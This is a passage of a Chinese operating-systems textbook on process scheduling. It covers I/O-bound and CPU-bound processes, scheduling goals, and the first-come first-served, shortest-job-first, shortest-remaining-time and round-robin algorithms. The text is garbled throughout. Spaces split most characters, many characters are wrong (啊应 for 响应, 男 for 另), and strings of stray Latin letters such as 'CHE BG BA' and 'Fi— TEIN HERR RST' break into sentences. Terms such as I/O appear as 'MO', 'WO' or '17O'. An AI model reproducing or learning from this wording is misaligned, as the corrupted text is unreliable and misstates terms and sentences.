其 次 ， 同 CPU 是 稀缺 资源 时 的 年 代 相 比 ， 现 在 计算 机 速度 极 快 。 
个 人 计算 机 的 多 数 程序 受到 的 是 用 户 当前 输入 速率 CHE BG BA 
标 ) 的 限制 ， 而 不 是 CPU 处 理 速率 的 限制 。 即 便 对 于 编译 (这 是 过 去 
CPU 周期 的 主要 消耗 者 ) 现在 大 多 数 情况 下 也 只 要 花费 仅仅 几 秒 钟 。 
甚至 两 个 实际 同时 运行 的 程序 ， 诸 如 一 个 文字 处 理 软件 和 一 个 电子 表 
单 ， 由 于 用 户 在 等 等 两 者 完成 工作 ， 因 此 很 难说 需要 哪 一 个 先 完成 。 
这 样 的 结果 是 ， 调 度 程序 在 简单 的 PC 机 上 并 不 重要 。 当 然 ， 总 有 应 用 
程序 会 实际 消耗 掉 CPU， 例 如 ， 为 绘制 一 小 时 高 精度 视频 而 调整 108 


oooi 〈(NTSC 制 ) 或 90 COON (PAL 制 ) 中 的 每 一 帧 颜色 就 需要 大 量 工 
业 强 度 的 计算 能 力 。 然 而 ， 类 似 的 应 用 程序 不 在 我 们 的 考虑 范围 。 


当 我 们 转向 网 络 服务 器 时 ， 人 情况 略微 有 些 改 变 。 这 里 ， 多 个 进程 
经 肖 鄞 争 CPU， 因 此 调度 功能 再 一 次 变 得 至 关 重 要 。 例 如 ， 当 CPU 必 
须 在 运行 一 个 收集 每 日 统计 数据 的 进程 和 服务 用 户 需 求 的 进程 之 间 进 
行 选择 的 时 候 ， 如 果 后 者 首先 占用 了 CPU， 用 户 将 会 更 高 兴 。 


另外 ， 为 了 选取 正确 的 进程 运行 ， 调 度 程 序 还 要 考虑 CPU 的 利用 
率 ， 因 为 进程 切换 的 代价 是 比较 高 的 。 首 先 用 户 态 必须 切换 到 内 核 
aS; 然后 要 保存 当前 进程 的 状态 ， 包 括 在 进程 表 中 存储 寄存 此 值 以 便 
以 后 重新 装载 。 在 许多 系统 中 ， 内 存 映像 (例如 ， 页 表 内 的 内 存 访问 
位 ) 也 必须 保存 ， 接 着 ， 通 过 运行 调度 算法 选 定 一 个 新 进程 ， 之 后 ， 
应 该 将 新 进程 的 内 存 映 像 重 新 装 入 MMU; 最 后 新 进程 开始 运行 。 除 此 
之 外 ， 进 程 切 换 还 要 使 整个 内 存 高 速 缓 存 失 效 ， 强 迫 缓 存 从 内 存 中 动 
态 重 新 装 入 两 次 (进入 内 核 一 次 ， 离 开 内 核 一 次 ) ° AZ, WREE 
钟 切 换 进 程 的 次 数 太 多 ， 会 耗费 大 量 CPU 时 间 ， 所 以 有 必要 提醒 注 


ET o 
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1. 进 程 行为 


几乎 所 有 进程 的 〈 磁 强 ) IO 请 求 或 计算 都 是 交替 突 发 的 ， 如 图 2- 
38 所 示 。 典 型 地 ，CPU 不 停顿 地 运行 一 段 时 间 ， 然 后 发 出 一 个 系统 调 


用 以 便 读 写 文 件 。 在 完成 系统 调用 之 后 ，CPU 又 开始 计算 ， 直 到 它 需 
要 读 更 多 的 数据 或 写 更 多 的 数据 为 止 。 请 注意 ， 某 些 WO 活 动 可 以 看 作 
是 计算 。 例 如 ， 当 CPU 向 视频 RAM 复 制 数据 以 更 新 屏幕 时 ， 因 为 使 用 
了 CPU， 所 以 这 和 是 计算 ， 而 不 是 MO 活动 。 按 照 这 种 观点 ， 当 一 个 进程 
等 待 外 部 设备 完成 工作 而 被 阻塞 时 ， 才 是 WO 活动 。 


a) 


长 CPU 突 发 


短 CPU 突 发 


时 间 一 一 全 


图 2-38 CPU 的 突 发 使 用 和 等 待 JO 的 时 期 交替 出 现 ; aJCPU 密 集 型 进 
程 ，b)I7O 密 集 型 进程 


图 2-38 中 有 一 件 值得 注意 的 事 ， 即 某 些 进程 〈 图 2-38a 的 进程 ) 花 
费 了 绝 大 多 数 时 间 在 计算 上 ， 而 其 他 进程 〈 图 2-38b 的 进程 ) 则 在 等 待 
1/O 上 花费 了 绝 大 多 数 时 间 。 前 者 称 为 计算 密集 型 (compute-bound) , 
后 者 称 为 /O 密 集 型 (WO-bound) 。 典 型 的 计算 密集 型 进程 具有 较 长 时 
间 的 CPU 集中 使 用 和 较 小 频 度 的 MO 等 待 。IO 密 集 型 进程 具有 较 短 时 间 
的 CPU 集 中 使 用 和 频繁 的 VO 等 待 。 它 是 VO 类 的 ， 因 为 这 种 进程 在 WO 
请 求 之 间 较 少 进行 计算 ， 并 不 是 因为 它们 有 特别 长 的 VO 请 求 。 在 IO 开 


9 后 无 论处 理 数据 是 多 还 是 少 ， 它 们 部 花费 同样 的 时 间 提 出 硬件 请 求 
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有 必要 指出 ， 随 春 CPU 变 得 越 来 越 快 ， 更 多 的 进程 倾 同 为 TO 密集 
型 。 这 种 现象 之 所 以 发 生 是 因为 CPU 的 改进 比 磁盘 的 改进 快 得 多 ， 其 
结果 是 ， 未 来 对 MO 密集 型 进程 的 调度 处 理 似乎 更 为 重要 。 这 里 的 基本 
思想 是 ， 如 果 需 要 运行 IO 密集 型 进程 ， 那 么 束 应 该 让 它 尽快 得 到 机 
会 ， 以 便 发 出 磁盘 请 求 并 保持 位 强 始 终 忙 态 。 从 图 2-6 中 可 以 看 到 ， 如 
果 进 程 是 1O 密 集 型 的 ， 则 需要 多 运行 一 些 这 类 进程 以 保持 CPU 的 充分 
利用 。 


2. 何 时 调度 


有 关 调 度 处 理 的 一 个 关键 问题 是 何 时 进行 调度 决策 。 存 在 着 需要 
调度 处 理 的 各 种 情形 。 第 一 ， 在 创建 一 个 新 进程 之 后 ， 需 要 决定 是 运 
行 父 进 程 还 古 运 行 子 进 程 。 由 于 这 两 种 进程 部 处 于 就 绪 状 态 ， 所 以 这 
是 一 种 正常 的 调度 决策 ， 可 以 任意 决定 ， 也 就 是 说 ， 调 度 程序 可 以 合 
法 选择 先 运行 父 进 程 还 是 先 运行 子 进程 。 


第 二 ， 在 一 个 进程 退出 时 必须 做 出 调度 决策 。 一 个 进程 不 再 运行 
(因为 它 不 再 存在 ) ， 所 以 必须 从 束 绪 进程 集中 选择 另外 茶 个 进程 。 
如 琳 没 有 束 弹 的 进程 ， 通 常会 运行 一 个 系统 提供 的 空 几 进程 。 


第 三 ， 当 一 个 进程 阻塞 在 17O 和 信和 号 量 上 或 由 于 其 他 原因 阻塞 时 ， 
必须 选择 另 一 个 进程 运行 。 有 时 ， 阻 塞 的 原因 会 成 为 选择 的 因素 。 例 
如 ， 如 采 A 和 是 一 个 重要 的 进程 ， 并 正在 等 待 B 退 出 临界 区 ， 让 B 随 后 运 
行将 会 使 得 B 退 出 临界 区 ， 从 而 可 以 让 A 运行 。 不 过 问题 是 ， 通 常 调度 
程序 并 不 拥有 做 出 这 种 相关 考虑 的 必要 信息 。 


第 四 ， 在 一 个 IO 中 断 发 生 时 ， 必 须 做 出 调度 决策 。 如 果 中 断 来 自 
IO 设备 ， 而 该 设备 现在 完成 了 工作 ， 某 些 被 阻塞 的 等 待 该 O 的 进程 加 
成 为 可 运行 的 就 绪 进 程 了 。 是 否 让 新 就 绪 的 进程 运行 ， 这 取决 于 调度 
程序 的 决定 ， 或 者 让 中 断 发 生 时 运行 的 进程 继续 运行 ， 或 者 应 该 让 某 
个 其 他 进程 运行 。 


如 琳 人 硬件 时 钟 提供 50Hz、60Hz 或 其 他 频率 的 周期 性 中 断 ， 可 以 在 
每 个 时 钟 中 断 或 者 在 每 k 个 时 钟 中 断 时 做 出 调度 决策 。 根 据 如 何 处 理 时 
钟 中 断 ， 可 以 把 调度 算法 分 为 两 类 。 非 抢占 式 调 度 算 法 挑选 一 个 进 
程 ， 然 后 让 该 进程 运行 直至 被 阻塞 阻塞 在 1O 上 或 等 待 另 一 个 进 
程 )， 或 者 直到 该 进程 自动 释放 CPU。 即 使 该 进程 运行 了 若干 个 小 
时 ， 它 也 不 会 税 强 迫 挂 起 。 这 样 做 的 结果 古 ， 在 时 钟 中 断 发 生 时 不 会 
进行 调度 。 在 处 理 完 时 钟 中 断后 ， 如 果 没 有 更 高 优先 级 的 进程 等 符 到 
时 ， 则 被 中 断 的 进程 会 继续 执行 。 


相反 ， 抢 占 式 调度 算法 挑选 一 个 进程 ， 并且 让 该 进程 运行 某 个 固 
定时 段 的 最 大 值 。 如 果 在 该 时 段 结束 时 ， 该 进程 仍 在 运行 ， 它 就 被 挂 


起 ， 而 调度 程序 挑选 男 一 个 进程 运行 RE EP EAE) 。 进 
行 抢占 式 调度 处 理 ， 需 要 在 时 间 间 隔 的 末端 发 生 时 钟 中 断 ， 以 便 把 
CPU 控制 返回 给 调度 程序 。 如 果 没 有 可 用 的 时 钟 ， 那 么 非 抢占 式 调 度 
束 是 惟一 的 选择 了 。 


3. 调 度 算法 分 类 


毫 无 疑问 ， 不 同 的 环境 需要 不 同 的 调度 算法 。 之 所 以 出 现 这 种 情 
形 ， 是 因为 不 同 的 应 用 领域 (以 及 不 同 的 操作 系统 ) 有 不 同 的 目标 。 
换 句 话 说， 在 不 同 的 系统 中 ， 调 度 程序 的 优化 是 不 同 的 。 这 里 有 必要 
划分 出 三 种 环境 : 


1) 批 处 理 。 

HLA 

3) 实 时 。 

批 处 理 系统 在 商业 领域 仍 在 广泛 应 用 ， 用 来 处 理 薪 水 册 、 存 货 请 
单 、 账 日 收入 、 账 目 支 出 、 利 肯 计 算 ERIT) RRE (在 保险 
公司 ) 和 其 他 的 周期 性 的 作业 。 在 批 处 理 系 统 中 ， 不 会 有 用 户 不 耐烦 
地 在 终端 劳 等 待 一 个 短 请 求 的 快捷 啊 应 。 因 此 ， 非 抢占 式 算法 ， 或 对 


每 个 进程 都 有 长 时 间 周 期 的 抢占 式 算法 ， 通 常 都 是 可 接受 的 。 这 种 处 
理 方式 减少 了 进程 的 切换 从 而 改善 了 性 能 。 这 些 批 处 理 算法 实际 上 相 


当 普 及 ， 并 经 常 可 以 应 用 在 其 他 场合 ， 这 使 得 人 们 值得 去 学 习 它 们 ， 
甚至 是 对 于 那些 没有 接触 过 大 型 机 计算 的 人 们 。 


在 交互 式 用 户 环境 中 ， 为 了 避免 一 个 进程 霸占 CPU 拒绝 为 其 他 进 
程 服务 ， 抢 占 是 必需 的 。 即 便 没 有 进程 想 永 远 运 行 ， 但 是 ， 某 个 进程 
由 于 一 个 程序 错误 也 可 能 无 限期 地 排斥 所 有 其 他 进程 。 为 了 避免 这 种 
现象 发 生 ， 抢 占 也 十 必要 的 。 服 务 器 也 归于 此 类 ， 因 为 通常 它们 要 服 
务 多 个 突 发 的 (远程 ， 用 户 。 


然而 在 有 实时 限制 的 系统 中 ， 抢 占有 时 是 不 需要 的 ， 因 为 进程 了 
解 它 们 可 能 会 长 时 间 得 不 到 运行 ， 所 以 通 第 很 快 地 完成 各 目的 工作 并 
阻塞 。 实 时 系统 与 交互 式 系统 的 老 别 是 ， 实 时 系统 只 运行 那些 用 来 推 
进 现 有 应 用 的 程序 ， 而 交互 式 系统 是 通用 的 ， 它 可 以 运行 任意 的 非 协 
作 甚 至 是 有 恶意 的 程序 。 


4. 调 度 算法 的 目标 


为 了 设计 调度 算法 ， 有 必要 考虑 什么 是 一 个 好 的 调度 算法 。 某 些 
目标 取决 于 环境 ( 批 处 理 、 交 互 式 或 实时 ) ， 但 是 还 有 一 些 目标 是 适 
用 于 所 有 人 情形 的 。 在 图 2-39 中 列 出 了 一 些 目 标 ， 我 们 将 在 下 面 逐 一 讨 


论 。 


所 有 系统 
公平 一 给 每 个 进程 公平 的 CPU 份额 
策略 强制 执行 一 看 到 所 宣布 的 策略 执行 
平衡 一 保持 系统 的 所 有 部 分 都 忙碌 
批 处 理 系统 
吞吐 量 一 每 小 时 最 大 作业 数 
周转 时 间 一 一 从 提交 到 终止 间 的 最 小 时 闻 


CPU 利用 率 一 一 保持 CPU 始终 忙碌 
交互 式 系统 
啊 应 时 间 一 一 快速 啊 应 请 求 
均衡 性 一 一 满足 用 户 的 期 望 
实时 系统 
满足 截止 时 间 一 一 避免 丢失 数据 
可 预测 性 一 一 在 多 媒体 系统 中 避免 品质 降低 


图 2-39 在 不 同 环境 中 调度 算法 的 一 些 目标 


在 所 有 的 情形 中 ， 公 平定 很 重要 的 。 相 似 的 进程 应 该 得 到 相似 的 
服务 。 对 一 个 进程 给 予 较 其 他 等 价 的 进程 更 多 的 CPU 时 间 走 不 公平 
的 。 当 然 ， 不 同类 型 的 进程 可 以 采用 不 同方 式 处 理 。 可 以 考虑 一 下 在 
核反应 扒 计算 机 中 心安 全 控制 与 发 放 薪 水 处 理 之 间 的 差别 。 


与 公平 有 关 的 是 系统 策略 的 强制 执行 。 如 果 局 部 策略 是 ， 只 要 需 
要 就 必须 运行 安全 控制 进程 (即便 这 意味 着 推迟 30 秒 钟 发 薪 ) ， 那 么 
调度 程序 就 必须 保证 能 够 强制 执行 该 策略 。 


Fi— TEIN HERR RST AT BBB oT RAT REEE e W RCPU 
和 所 有 IO 设备 能 够 始终 运行 ， 那 么 相对 于 让 某 些 部 件 空转 而 言 ， 每 秒 
钟 就 可 以 完成 更 多 的 工作 。 例 如 ， 在 批 处 理 系统 中 ， 调 度 程序 控制 哪 
个 作业 调 入 内 存 运 行 。 在 内 存 中 既 有 一 些 CPU 密 集 型 进程 又 有 一 些 I/O 
密集 型 进程 是 一 个 较 好 的 想法 ， 好 于 先 调 入 和 运行 所 有 的 CPU 密 集 型 
作业 ， 然 后 在 它们 完成 之 后 再 调 入 和 运行 所 有 IO 密集 型 作业 的 做 法 。 
如 果 使 用 后 面 一 种 策略 ， 在 CPU 密 集 型 进程 运行 时 ， 它 们 就 要 竞争 
CPU， 而 磁盘 却 在 空转 。 稍 后 ， 当 IO 密集 型 作业 来 了 之 后 ， 它 们 要 为 
磁盘 而 竞争 ， 而 CPU 又 空转 了 。 显 然 ， 通 过 对 进程 的 仔细 组 合 ， 可 以 


保持 整个 系统 运行 得 更 好 一 些 。 


运行 大 量 批 处 理 作 业 的 天 型 计算 中 心 的 管理 者 们 为 了 和 擎 握 其 系统 
的 工作 状态 ， 通 冲 检 查 三 个 指标 : 吞吐 量 、 周 转 时 间 以 及 CPU 利用 
K o MIER (throughout) 是 系统 每 小 时 完成 的 作业 数量 。 把 所 有 的 因 
素 考 虑 进去 之 后 ， 每 小 时 完成 50 个 作业 好 于 每 小 时 完成 40 个 作业 。 周 
转 时 间 (turnaround time) 是 指 从 一 个 批 处 理 作 业 提 交 时 刻 开始 直到 该 
作业 完成 时 刻 为 止 的 统计 平均 时 间 。 该 数据 度量 了 用 户 要 得 到 输出 所 
需 的 平均 等 待 时间 。 其 规则 是 : 小 区 是 好 的 。 


能 够 使 存 吐 量 最 大 化 的 调度 算法 不 一 定 就 有 最 小 的 周转 时 间 。 例 
如 ， 对 于 确定 的 短 作 业 和 长 作业 的 一 个 组 合 ， 总 是 运行 短 作业 而 不 运 
行 长 作业 的 调度 程序 ， 可 能 会 获得 出 色 的 吞吐 性 能 〈 每 小 时 大 量 的 短 


作业 ) ， 但 是 其 代价 是 对 于 长 的 作业 周转 时 间 很 差 。 如 果 短 作业 以 一 
个 稳定 的 速率 不 断 到 达 ， 长 作业 可 能 根本 运行 不 了 ， 这 样 平均 周转 时 
间 是 无 限 长 ， 但 是 得 到 了 高 的 否 吐 量 。 


CPU 利 用 率 常 常用 于 对 批 处 理 系 统 的 度量 。 尽 管 这 样 ，CPU 利 用 
率 并 不 是 一 个 好 的 度量 参数 。 真 正 有 价值 的 是 ， 系 统 每 小 时 可 完成 多 
少 作 业 (FEE) ， 以 及 完成 作业 需要 多 长 时 间 (周转 时 间 ) 。 把 
CPU 利 用 率 作为 度量 依据 ， 就 像 用 引擎 每 小 时 转动 了 多 少 次 来 比较 汽 
车 的 好 坏 一 样 。 另 一 方面 ， 知 道 什 么 时 候 CPU 利 用 率 接近 100% 比 知道 
什么 时 候 要 求 得 到 更 多 的 计算 能 力 要 有 用 。 


对 于 交互 式 系统 ， 则 有 不 同 的 指标 。 最 重要 的 是 最 小 啊 应 时 间 ， 
即 从 发 出 命令 到 得 到 响应 之 间 的 时 间 。 在 有 后 人 台 进 程 运行 (例如 ， 从 
网 络 上 读 取 和 存储 电子 邮件 ) 的 个 人 计算 机 上 ， 用 户 请 求 启动 一 个 程 
序 或 打开 一 个 文件 应 该 优先 于 后 台 的 工作 。 能 够 让 所 有 的 交互 式 请 求 
首先 运行 的 则 是 好 服务 。 


一 个 相关 的 问题 是 均衡 性 。 用 户 对 做 一 件 事 情 需要 多 长 时 间 总 
有 一 种 固有 的 (不 过 通常 不 正确 ) 看 法 。 当 认为 一 个 请 求 很 复杂 需要 
较 多 的 时 间 时 ， 用 户 会 接受 这 个 看 法 ， 但 是 当 认 为 一 个 请 求 很 简单 ， 
但 也 需要 较 多 的 时 间 时 ， 用 户 就 会 急躁 。 例 如 ， 如 果 点 击 一 个 图 标 花 
费 了 60 秒 钟 发 送 完成 一 份 传真 ， 用 户 大 概 会 接受 这 个 事实 ， 因 为 他 没 
有 期 望花 5 秒 钟 得 到 传真 。 
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男 一 方面 ， 当 传真 发 送 完 成 ， 用 户 点 击 断 开 电 话 连 接 的 图 标 时 ， 
该 用 户 就 有 不 一 样 的 期 待 了 。 如 果 30 秒 之 后 还 没有 完成 断 开 操作 ， 用 
尸 束 可 能 会 抱 纺 ， 而 60 秒 之 后 ， 他 束 要 气 得 要 命 了 。 之 所 以 有 这 种 行 
为 ， 其 原因 是 : 一 般 用 户 认 为 拿 起 听 简 并 建立 通话 连接 所 需 的 时 间 要 
比 挂 掉 电 话 所 需 的 时 间 长 。 在 有 些 情 形 下 (如 本 例 ) ， 调 度 程 序 对 响 
应 时 间 指 标 起 不 了 作用 ; 但 是 在 另外 一 些 情形 下 ， 调 度 程 序 还 是 能 够 
做 一 些 事 的 ， 特 别 是 在 出 现 差 的 进程 顺序 选择 时 。 


实时 系统 有 着 与 交互 式 系统 不 一 样 的 特性 ， 所 以 有 不 同 的 调度 目 
标 。 实 时 系统 的 特点 十 或 多 或 少 必须 满足 截止 时 间 。 例 如 ， 如 果 计 算 
机 正在 控制 一 个 以 正常 速率 产生 数据 的 设备 ， 有 一 个 按时 运行 的 数据 
收集 进程 出 现 失败 ， 会 导致 数据 丢失 。 所 以 ， 实 时 系统 最 主要 的 要 求 
是 满足 所 有 的 (或 大 多 数 ) 截止 时 间 要 求 。 


在 多 数 实时 系统 中 ， 特 别 是 那些 涉及 多 媒体 的 实时 系统 中 ， 可 预 
测 性 是 很 重要 的 。 侦 尔 不 能 满足 截止 时 间 要 来 的 问题 并 不 庆 重 ,但 是 
如 采 首 频 进程 运行 的 错误 太 多 ， 那 么 首 质 束 会 下 降 得 很 快 。 视 频 品质 
也 是 一 个 问题 ,但 是 人 的 耳 灯 比 眼睛 对 抖动 要 敏感 得 多 。 为 了 避免 这 
些 问 题 ， 进 程 调度 程序 必须 是 高 度 可 预测 和 有 规律 的 。 在 本 章 中 我 们 
将 研究 批 处 理 和 交互 式 调度 算法 ， 而 把 有 关 实 时 调度 处 理 的 研究 放 到 
第 7 章 多 媒体 操作 系统 


2.4.2” 批 处 理 系 统 中 的 调度 


现在 我 们 从 一 般 的 调度 处 理 问 题 转 向 特定 的 调度 算法 。 在 这 一 节 
中 ， 我 们 将 考察 在 批 处 理 系 统 中 使 用 的 算法 ， 随 后 将 讨论 交互 式 和 实 
时 系统 中 的 调度 算法 。 有 必要 指出 ， 某 些 算 法 既 可 以 用 在 批 处 理 系 统 
中 ， 也 可 以 用 在 交互 式 系 统 中 。 我 们 将 稍 后 讨论 这 个 问题 。 


1. 先 来 完 服 务 


在 所 有 调度 算法 中 ， 最 简单 的 是 非 抢 占 式 的 先 来 先 服务 (first- 
come first-severd) 算法 。 使 用 该 算法 ， 进 程 按照 它们 请 求 CPU 的 顺序 
使 用 CPU。 基 本 上 ， 有 一 个 吏 绪 进程 的 单一 队列 。 早 上 ， 当 第 一 个 作 
业 从 外 部 进入 系统 ， 就 立即 开始 并 允许 运行 它 所 期 望 的 时 间 。 不 会 
断 该 作业 ， 因 为 它 需 要 很 长 的 时 间 运 行 。 当 其 他 作业 进入 时 ， 它 们 就 
被 安排 到 队列 的 尾部 。 当 正在 运行 的 进程 被 阻塞 时 ， 队 列 中 的 第 一 个 
进程 承接 着 运行 。 在 被 阻塞 的 进程 变 为 就 绪 时 ， 就 像 一 个 新 来 到 的 作 
业 一 样 ， 排 到 队列 的 末尾 。 


这 个 算法 的 主要 优点 是 易于 理解 并 且 便 于 在 程序 中 运用 。 就 难以 
得 到 的 体育 或 音乐 会 票 的 分 配 问 题 而 言 ， 这 对 那些 愿意 在 早上 两 点 就 
去 排队 的 人 们 也 是 公平 的 。 在 这 个 算法 中 ， 一 个 单 链 表 记 录 了 所 有 融 
绪 进 程 。 要 选取 一 个 进程 运行 ， 只 要 从 该 队列 的 头 部 移 走 一 个 进程 即 


可 ; 要 添加 一 个 新 的 作业 或 阻塞 一 个 进程 ， 只 要 把 该 作业 或 进程 附加 
在 相应 队列 的 末尾 即 可 。 还 有 比 这 更 和 商 单 的 理解 和 实现 吗 ? 


不 过 ， 先 来 完 服务 也 有 了 明显 的 忠 操 。 假 设 有 一 个 一 次 运行 1 秒 钟 的 
计算 密集 型 进程 和 很 少 使 用 CPU 但 是 每 个 都 要 进行 1000 次 磁盘 读 操作 
才能 完成 的 大 量 1O 密 集 型 进程 存在 。 计 算 密集 进程 运行 1 秒 钟 ， 授 着 读 
一 个 磁盘 块 。 所 有 的 IO 进程 开始 运行 并 读 磁 副 。 当 该 计算 密集 进程 获 
得 其 磁盘 块 时 ， 它 运行 下 一 个 1 秒 钟 ， 紧 跟随 看 的 是 所 有 IO 进程 。 


这 样 做 的 结果 是 ， 每 个 MO 进程 在 每 秒 钟 内 读 到 一 个 磁盘 块 ， 要 人 花 
费 1000 秒 钟 才能 完成 操作 。 如 果 有 一 个 调度 算法 每 10ms 抢 占 计算 密集 
型 进程 ， 那 么 WO 进程 将 在 10 秒 钟 内 完成 而 不 是 1000 秒 钟 ， 而 且 还 不 会 
对 计算 密集 型 进程 产生 多 少 延 迟 。 


2. 最 短 作业 优先 


现在 来 看 一 种 适用 于 运行 时 间 可 以 预知 的 男 一 个 非 抢占 式 的 批 处 
理 调度 算法 。 例 如 ， 一 家 保险 公司 ， 因 为 每 天 都 做 类 似 的 工作 ， 所 以 
人 们 可 以 相当 精确 地 预测 处 理 1000 个 索赔 的 一 批 作业 需要 多 少时 间 。 
当 输 入 队列 中 有 才干 个 同等 重要 的 作业 被 启动 时 ， 调 度 程序 应 使 用 最 
短 作业 优先 (shortest job first) 算法 ， 请 看 图 2-40。 这 里 有 4 个 作业 A、 
B、C、D， 运 行 时 间 分 别 为 8、4、4、4 分 钟 。 若 按 图 中 的 次 序 运行 ， 


则 A 的 周转 时 间 为 8 分 钟 ，B 为 12 分 钟 ，C 为 16 分 钟 ，D 为 20 分 钟 ， 平 均 
为 14 分 钟 。 


8 4 4 4 - ws 8 
a) b) 


图 2-40 最 短 作业 优先 调度 的 例子 ，a) 按 原 有 次 序 运行 4 个 作业 ; b) 
按 最 短 作 业 优 先 次 序 运 行 


现在 考虑 使 用 最 短 作 业 优 先 算法 运行 这 4 个 作业 ， 如 图 2-40b 所 示 。 
目前 周转 时 间 分 别 为 4、8、12 和 20 分 钟 ， 平 均 为 11 分 钟 。 可 以 证 明 最 
短 作业 优先 十 最 优 的 。 考 虑 有 4 个 作业 的 情况 ， 其 运行 时 间 分 别 为 a、 
b、c、d。 第 一 个 作业 在 时 间 a 结束 ， 第 二 个 在 时 间 a+b 结 束 ， 以 此 类 
推 。 平 均 周转 时 间 为 (4a+3b+2c+d) /4。 显 然 a 对 平均 值 影响 最 大 ， 所 
以 它 应 是 最 短 作 业 ， 其 次 是 bp， 表 次 是 c， 最 后 的 d 只 影响 它 目 己 的 周转 
时 间 。 对 任意 数目 作业 的 情况 ， 道 理 完全 一 样 。 


有 必要 指出 ， 只 有 在 所 有 的 作业 都 可 同时 运行 的 情形 下 ， 最 短 作 
业 优 先 算 法 才 是 最 优化 的 。 作 为 一 个 反例 ， 考 虚 5 个 作业 ， 从 A 到 E， 运 
行 时 间 分 别 是 2、4、1、1 和 1。 它 们 的 a 到达 时 间 是 0、0、3、3 和 3。 开 
始 ， 只 能 选择 A 或 B， 因 为 其 他 三 个 作业 还 没有 到 达 。 使 用 最 短 作业 优 
先 ， 将 按照 A、B、C、D 、E 的 顺序 运行 作业 ， 其 平均 等 待 时 间 是 4.6。 


但 是 ， 按 照 B、C、D、E、A 的 顺序 运行 作业 ， 其 平均 等 待 时 间 则 是 


4.4。 


3. 最 短 剩余 时 间 优 先 


最 短 作 业 优 移 的 抢占 式 版 本 是 最 短 剩 余 时 间 优 先 (shortest 
remaining time next) 算法 。 使 用 这 个 算法 ， 调 度 程序 总 是 选择 剩余 运 
行 时 间 最 短 的 那个 进程 运行 。 再 次 提醒 ， 有 关 的 运行 时 间 必 须 提 前 党 
。 当 一 个 新 的 作业 到 达 时 ， 其 整个 时 间 同 当前 进程 的 剩余 时 间 做 比 
较 。 如 果 新 的 进程 比 当前 运行 进程 需要 更 少 的 时 间 ， 当 前 进程 就 被 挂 
起 ， 而 运行 新 的 进程 。 这 种 方式 可 以 使 新 的 短 作业 获得 民 好 的 服务 。 


Bl 


2.43 ”交互 式 系统 中 的 调度 


现在 考察 用 于 交互 式 系统 中 的 一 些 调度 算法 ， 它 们 在 个 人 计算 
机 、 服 务 右 和 其 他 类 系统 中 都 是 利用 的 。 


1. 轮 转调 度 


种 最 古老 、 最 简单 、 最 公平 且 使 用 最 广 的 算法 是 轮转 调度 
(round robin) 。 每 个 进程 被 分 配 一 个 时 间 段 ， 称 为 时 间 片 
(quantum) ， 即 允许 该 进程 在 该 时 间 段 中 运行 。 如 果 在 时 间 片 结束 时 
该 进程 还 在 运行 ， 则 将 刊 和 村 CPU 并 分 配给 另 一 个 进程 。 如 采 该 进程 在 
时 间 片 结束 前 阻塞 或 结束 ， 则 CPU 立即 进行 切换 。 时 间 片 轮转 调度 很 
容易 实现 ， 调 度 程 序 所 要 做 的 就 是 维护 一 张 可 运行 进程 列表 ， 如 图 2- 
41a 所 示 。 当 一 个 进程 用 完 它 的 时 间 放 后 ， 吏 被 移 到 队列 的 末尾 ， 如 疼 


2-41b 所 示 。 


下 一 个 
当前 进程 进程 当前 进程 
B| D 回 a 
a) b) 


图 2-41 轮转 调度 : a) 可 运行 进程 列表 ;b) 进 程 B 用 完 时 间 片 后 的 可 
运行 进程 列表 


时 间 片 轮转 调度 中 惟一 有 趣 的 一 点 是 时 间 卢 的 长 度 。 从 一 个 进程 
切换 到 另 一 个 进程 是 需要 一 定时 间 进 行 管 理事 务 处 理 的 一 一 保存 和 装 
入 寄存 器 值 及 内 存 映 像 、 更 新 各 种 表格 和 列表 、 清 除 和 重新 调 入 内 存 
高 速 缓存 等 。 假 如 进程 切换 (process switch) ， 有 时 称 为 上 下 文 切换 
(context switch) ， 需 要 1ms， 包 括 切 换 内 存 映 像 、 清 除 和 重新 调 入 高 
速 缓存 等 。 再 假设 时 间 片 设 为 4ms。 有 了 这 些 参数 ， 则 CPU 在 做 完 4ms 
有 用 的 工作 之 后 ，CPU 将 花费 ( 即 浪费 ) lms 来 进行 进程 切换 。 因 此 ， 
CPU 时 间 的 20% 淄 费 在 管理 开销 上 。 很 清楚 ， 这 一 管理 时 间 太 多 了 。 


为 了 提高 CPU 的 效率 ， 我 们 可 以 将 时 间 片 设置 成 ， 比 方 说 ， 
100ms， 这 样 浪费 的 时 间 只 有 1%。 但 是 ， 如 果 在 一 段 非常 短 的 时 间 间 
隅 内 到 达 50 个 请 求 ， 并 且 对 CPU 有 不 同 的 需求 ， 那 么 ， 考 虑 一 下 ,在 
一 个 服务 器 系统 中 会 发 生 什 么 昵 ? 50 个 进程 会 放 在 可 运行 进程 的 列表 
中 。 如 有 果 CPU 有 是 空 亲 的 ， 第 一 个 进程 会 立即 开始 执行 ， 第 二 个 直到 
100ms 以 后 才 会 司 动 ， 以 此 类 推 。 假 设 所 有 其 他 进程 都 用 足 了 它们 的 时 
间 捕 的话 ， 节 不 科 的 是 最 后 一 个 进程 在 获得 运行 机 会 之 前 将 不 得 不 等 
待 5 秒 钟 。 大 部 分 用 户 会 认为 5 秒 的 啊 应 对 于 一 个 短命 令 来 说 是 缓慢 
的 。 如 于 一 些 在 队列 后 端 附近 的 请 求 仅 要 求 儿 至 秒 的 CPU 时 间 ， 上 面 
的 情况 会 变 得 尤其 糟 料 。 如 末 使 用 较 短 的 时 间 片 的 话 ， 它 们 将 会 获得 
更 好 的 服务 。 


男 一 个 因素 是 ， 如 琳 时 间 厂 设置 长 于 平均 的 CPU 突 发 时 间 ， 那 么 
不 会 经 闻 发 生 抢 占 。 相 反 ， 在 时 间 片 耗费 完 之 前 多 数 进程 会 完成 一 个 
阻塞 操作 ， 引 起 进程 的 切换 。 抢 占 的 消失 改善 了 性 能 ， 因 为 进程 切换 
会 发 生 在 确实 逻辑 上 有 需要 的 时 候 ， 即 进程 被 阻塞 不 能 够 继续 运 
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可 以 归结 如 下 结论 : 时 间 片 设 得 太 短 会 导致 过 多 的 进程 切换 ， 降 
低 了 CPU 效率 ; 而 设 得 太 长 又 可 能 引起 对 短 的 交互 请 求 的 啊 应 时 间 变 
长 。 将 时 间 片 设 为 20ms~50 ms 通常 是 一 个 比较 合理 的 折 中 。 


2. 优 先 级 调度 


轮转 调度 做 了 一 个 隐 含 的 假设 ， 即 所 有 的 进程 同等 重要 ， 而 拥有 
和 操作 多 用 户 计 算 机 系统 的 人 对 此 常 有 不 同 的 看 法 。 例 如 ， 在 一 所 大 
里 ， 等 级 顺序 可 能 是 教务 长 首先 ， 然 后 是 教授 、 秘 书 、 后 勤 人 员 ， 
